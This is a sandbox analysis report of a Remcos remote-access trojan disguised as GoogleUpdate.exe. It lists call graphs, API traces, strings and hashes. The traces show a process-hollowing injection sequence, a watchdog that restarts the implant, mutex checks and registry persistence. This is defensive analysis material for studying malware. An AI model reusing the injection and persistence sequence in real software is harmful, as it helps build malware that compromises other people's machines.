46591->46600 46656 41642d 46591->46656 46594 410e01 46592->46594 46593->46591 46595 4194da 79 API calls 46594->46595 46596 410e06 CloseHandle 46595->46596 46679 4112e2 11 API calls 46596->46679 46599 410e1e 46601 401ee9 11 API calls 46599->46601 46603 402073 28 API calls 46600->46603 46602 410e27 46601->46602 46604 401fb8 11 API calls 46602->46604 46605 410e4b 46603->46605 46606 410e30 46604->46606 46607 402073 28 API calls 46605->46607 46606->46511 46608 410e5a 46607->46608 46609 4194da 79 API calls 46608->46609 46610 410e5f Sleep 46609->46610 46610->46561 46630 40e1a8 46611->46630 46612 411f34 3 API calls 46612->46630 46613 40e24e 46615 408098 28 API calls 46613->46615 46614 408098 28 API calls 46614->46630 46619 40e25b 46615->46619 46616 40e1da 46687 40bc59 108 API calls ___scrt_fastfail 46616->46687 46617 40e23e Sleep 46617->46630 46689 419bca 28 API calls 46619->46689 46622 40e267 46624 412204 14 API calls 46622->46624 46623 412204 14 API calls 46623->46630 46626 40e27a 46624->46626 46625 401ee9 11 API calls 46625->46630 46627 401ee9 11 API calls 46626->46627 46629 40e286 46627->46629 46628 402073 28 API calls 46628->46630 46631 402073 28 API calls 46629->46631 46630->46612 46630->46613 46630->46614 46630->46616 46630->46617 46630->46623 46630->46625 46630->46628 46633 41215f 14 API calls 46630->46633 46688 419bca 28 API calls 46630->46688 46632 40e297 46631->46632 46634 41215f 14 API calls 46632->46634 46633->46630 46635 40e2aa 46634->46635 46690 4112b5 TerminateProcess WaitForSingleObject 46635->46690 46637 40e2b2 ExitProcess 46643 412280 RegSetValueExA RegCloseKey 46642->46643 46644 4122aa 46642->46644 46643->46644 46644->46510 46646 4112f4 46645->46646 46647 41135a 46646->46647 46650 411304 46646->46650 46649 411374 46647->46649 46684 4113dc 28 API calls 46647->46684 46685 411581 11 API calls 46649->46685 46654 41133c 46650->46654 46682 4113dc 28 API calls 46650->46682 46653 410d46 46653->46575 46683 411581 11 API calls 46654->46683 46657 41645a 8 API calls 46656->46657 46658 41677e 46657->46658 46659 4164c7 ___scrt_fastfail 46657->46659 46658->46591 46659->46658 46660 41652d CreateProcessW 46659->46660 46661 416563 VirtualAlloc Wow64GetThreadContext 46660->46661 46662 4167b8 GetLastError 46660->46662 46663 416591 ReadProcessMemory 46661->46663 46664 416782 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 46661->46664 46662->46658 46663->46664 46665 4165b7 NtCreateSection 46663->46665 46664->46658 46665->46664 46666 4165df 46665->46666 46667 4165ff NtMapViewOfSection 46666->46667 46668 4165ee NtUnmapViewOfSection 46666->46668 46669 416623 VirtualFree NtClose TerminateProcess 46667->46669 46670 41666b GetCurrentProcess NtMapViewOfSection 46667->46670 46668->46667 46669->46657 46671 416666 46669->46671 46670->46664 46676 416698 _Yarn 46670->46676 46671->46658 46672 416734 WriteProcessMemory 46672->46664 46674 416753 46672->46674 46673 416757 Wow64SetThreadContext 46673->46664 46675 416770 ResumeThread 46673->46675 46674->46673 46675->46658 46675->46664 46676->46672 46676->46673 46677->46552 46678->46551 46679->46599 46680->46561 46682->46654 46683->46653 46684->46649 46685->46653 46688->46630 46689->46622 46690->46637

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c0 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 102 40d5c5-40d5c9 70->102 81 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->81 82 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->82 91 40d991-40d99a call 401fb8 81->91 92 40d67f-40d686 81->92 98 40d622-40d63f call 401f8b call 411f34 82->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 82->99 109 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 91->109 93 40d688 92->93 94 40d68a-40d6a7 GetModuleFileNameW call 4192ae 92->94 93->94 107 40d6b0-40d6b4 94->107 108 40d6a9-40d6ab 94->108 122 40d651 98->122 123 40d641-40d650 call 401f8b call 41239a 98->123 99->98 102->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 102->105 137 40dd2c 105->137 113 40d6b6-40d6c9 call 401e45 call 401f8b 107->113 114 40d717-40d72a call 401e45 call 401f8b 107->114 108->107 175 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 109->175 113->114 142 40d6cb-40d6d1 113->142 138 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 114->138 139 40d72c call 40e501 114->139 122->81 123->122 143 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 137->143 217 40d815-40d819 138->217 218 40d7af-40d7c8 call 401e45 call 401f8b call 439891 138->218 139->138 142->114 149 40d6d3-40d6d9 142->149 188 40dd6a-40dd6f call 413980 143->188 150 40d6f7-40d710 call 401f8b call 411eea 149->150 151 40d6db-40d6ee call 4060ea 149->151 150->114 178 40d712 call 4066a6 150->178 151->114 166 40d6f0 call 4067a0 151->166 176 40d6f5 166->176 220 40da61-40da63 175->220 221 40da65-40da67 175->221 176->114 178->114 217->109 219 40d81f-40d826 217->219 218->217 247 40d7ca-40d7f6 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed 218->247 223 40d8a7-40d8b1 call 408093 219->223 224 40d828-40d89a call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 219->224 225 40da6b-40da7c call 41aa4f CreateThread 220->225 226 40da69 221->226 227 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 221->227 236 40d8b6-40d8de call 40245c call 43254d 223->236 318 40d89f-40d8a5 224->318 225->227 226->225 349 40db83-40db9a call 401e45 call 401f8b 227->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 227->350 255 40d8f0 236->255 256 40d8e0-40d8ee call 434c30 236->256 293 40d7fb-40d810 call 401ef3 call 401ee9 247->293 262 40d8f2-40d93d call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 255->262 256->262 317 40d942-40d967 call 432556 call 401e45 call 40fbab 262->317 293->217 317->175 332 40d96d-40d98c call 401e45 call 419bca call 40de34 317->332 318->236 332->175 345 40d98e-40d990 332->345 345->91 360 40dbd9-40dbeb call 401e45 call 401f8b 349->360 361 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->361 350->349 372 40dc4c-40dc5e call 401e45 call 401f8b 360->372 373 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 360->373 361->360 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 372->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 372->384 373->372 383->384 404 40dcc1-40dcc2 SetProcessDEPPolicy 384->404 405 40dcc4-40dcd7 CreateThread 384->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->137 416 40dd03-40dd06 412->416 413->412 416->188 418 40dd08-40dd0d 416->418 418->143
                                APIs
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                  • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                • String ID: (#G$0gj$Access Level: $Administrator$Attempt-S4A0CI$C:\ProgramData\GoogleDat\GoogleUpdate.exe$Exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc
                                • API String ID: 1529173511-3621782200
                                • Opcode ID: 104a3c9b241d2f1ac50294723b8b2fc91c88932e73af8d88d8c9125c77f10c2a
                                • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                • Opcode Fuzzy Hash: 104a3c9b241d2f1ac50294723b8b2fc91c88932e73af8d88d8c9125c77f10c2a
                                • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 420 41642d-416456 421 41645a-4164c1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 420->421 422 4164c7-4164ce 421->422 423 4167be 421->423 422->423 425 4164d4-4164db 422->425 424 4167c0-4167ca 423->424 425->423 426 4164e1-4164e3 425->426 426->423 427 4164e9-416516 call 434c30 * 2 426->427 427->423 432 41651c-416527 427->432 432->423 433 41652d-41655d CreateProcessW 432->433 434 416563-41658b VirtualAlloc Wow64GetThreadContext 433->434 435 4167b8 GetLastError 433->435 436 416591-4165b1 ReadProcessMemory 434->436 437 416782-4167b6 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 434->437 435->423 436->437 438 4165b7-4165d9 NtCreateSection 436->438 437->423 438->437 439 4165df-4165ec 438->439 440 4165ff-416621 NtMapViewOfSection 439->440 441 4165ee-4165f9 NtUnmapViewOfSection 439->441 442 416623-416660 VirtualFree NtClose TerminateProcess 440->442 443 41666b-416692 GetCurrentProcess NtMapViewOfSection 440->443 441->440 442->421 445 416666 442->445 443->437 444 416698-41669c 443->444 446 4166a5-4166c3 call 4346b0 444->446 447 41669e-4166a2 444->447 445->423 450 416705-41670e 446->450 451 4166c5-4166d3 446->451 447->446 453 416710-416716 450->453 454 41672e-416732 450->454 452 4166d5-4166f8 call 4346b0 451->452 464 4166fa-416701 452->464 453->454 458 416718-41672b call 416841 453->458 455 416734-416751 WriteProcessMemory 454->455 456 416757-41676e Wow64SetThreadContext 454->456 455->437 459 416753 455->459 456->437 460 416770-41677c ResumeThread 456->460 458->454 459->456 460->437 463 41677e-416780 460->463 463->424 464->450
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000,?,00472200), ref: 00416474
                                • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection,?,00472200), ref: 00416488
                                • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection,?,00472200), ref: 0041649C
                                • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose,?,00472200), ref: 004164B0
                                • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,?,?,?,00472200), ref: 00416555
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,?,?,00472200), ref: 0041656D
                                • Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 00416583
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,00472200), ref: 004165A9
                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004165D1
                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004165F9
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00416619
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00472200), ref: 0041662B
                                • NtClose.NTDLL(?), ref: 00416635
                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 0041663F
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040,?,?,?,?,?,00472200), ref: 0041667F
                                • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,00472200), ref: 0041668A
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                • ResumeThread.KERNEL32(?), ref: 00416773
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00472200), ref: 0041678A
                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00472200), ref: 00416795
                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041679C
                                • NtClose.NTDLL(?), ref: 004167A6
                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 004167B0
                                • GetLastError.KERNEL32(?,?,?,?,?,00472200), ref: 004167B8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 3150337530-3035715614
                                • Opcode ID: 95136cae06b6c6de2e48ba00139107378fb37b92ff4b2ee653c99aadd9b5648f
                                • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                • Opcode Fuzzy Hash: 95136cae06b6c6de2e48ba00139107378fb37b92ff4b2ee653c99aadd9b5648f
                                • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A

                                Control-flow Graph

                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                  • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412276
                                  • Part of subcall function 00412268: RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004,?,?,?,00410B8A,0046403C,00000000), ref: 00412291
                                  • Part of subcall function 00412268: RegCloseKey.KERNEL32(?,?,?,?,00410B8A,0046403C,00000000), ref: 0041229C
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: (#G$0gj$Remcos restarted by watchdog!$T/F$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                • API String ID: 3018269243-793568179
                                • Opcode ID: e7a9a9d739bdae95c955215bb3ec3bd21588d81e8875e4da25406932dfd67bcf
                                • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                • Opcode Fuzzy Hash: e7a9a9d739bdae95c955215bb3ec3bd21588d81e8875e4da25406932dfd67bcf
                                • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00411F34: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                  • Part of subcall function 00411F34: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                  • Part of subcall function 00411F34: RegCloseKey.KERNEL32(?), ref: 00411F7D
                                • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                • ExitProcess.KERNEL32 ref: 0040E2B4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 0gj$3.8.0 Pro$override$pth_unenc
                                • API String ID: 2281282204-469497953
                                • Opcode ID: 31277eddf5376791683a2ccb2ca395caa34c6e3dbc7f718eb6fe82f8c46a5739
                                • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                • Opcode Fuzzy Hash: 31277eddf5376791683a2ccb2ca395caa34c6e3dbc7f718eb6fe82f8c46a5739
                                • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 4f9fc82b5c10d6610e5ed6531d98e333281f4b2b56e24c5c8b0cdbea65e89b46
                                • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                • Opcode Fuzzy Hash: 4f9fc82b5c10d6610e5ed6531d98e333281f4b2b56e24c5c8b0cdbea65e89b46
                                • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad
